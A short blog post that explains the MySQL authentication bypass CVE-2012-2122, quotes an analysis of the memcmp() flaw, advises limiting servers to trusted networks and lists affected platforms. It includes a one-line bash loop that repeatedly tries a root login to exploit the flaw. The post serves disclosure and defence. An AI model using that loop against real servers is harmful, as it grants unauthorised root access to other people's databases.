I'm a programmer specialising in performant and scalable systems using PHP and Ruby and cooking


Published:
On MySQL | Security

Security flaw in MySQL Server (CVE-2012-2122)

I just wanted to bring to people attentions the security flaw in MySQL server that enabled any attacker root access without needing to know the password.

As explained in this article CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL by HD Moore the flaw consists of a incorrect assumption in the memcmp() function.:

This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

This makes it very simple to brute force the root login with this simple script:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 10.2.11.201 2>/dev/null; done

The simplest fix is to ensure that your MySQL server is only accessable to people on trusted networks (i.e. 127.0.0.1) and harden the server itself. In our case our database servers are hosted seperately to our application servers and so only accessible to the local network.

The following list has been taken from the article purely to be helpful:

So far, the following systems have been confirmed as vulnerable: Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc ) OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc ) Debian Unstable 64-bit 5.5.23-2 ( via @derickr ) Fedora ( via hexed and confirmed by Red Hat ) Arch Linux (unspecified version)

Feedback so far indicates the following platforms are NOT vulnerable: Official builds from MySQL and MariaDB (including Windows) Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat) CentOS using official RHEL rpms Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all) Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18) Debian Linux lenny 32-bit 5.0.51a-24+lenny5 ( via @matthewbloch ) Debian Linux lenny 64-bit 5.0.51a-24+lenny5 ( via @matthewbloch ) Debian Linux lenny 64-bit 5.1.51-1-log ( via @matthewbloch ) Debian Linux squeeze 64-bit 5.1.49-3-log ( via @matthewbloch ) Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 ( via @matthewbloch ) Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 ( via @matthewbloch ) Gentoo 64-bit 5.1.62-r1 ( via @twit4c ) SuSE 9.3 i586 MySQL 4.1.10a ( via @twit4c ) OpenIndiana oi_151a4 5.1.37 ( via @TamberP )

You can view the full article here and I recommend you do for further description of the problem and defence recommendations.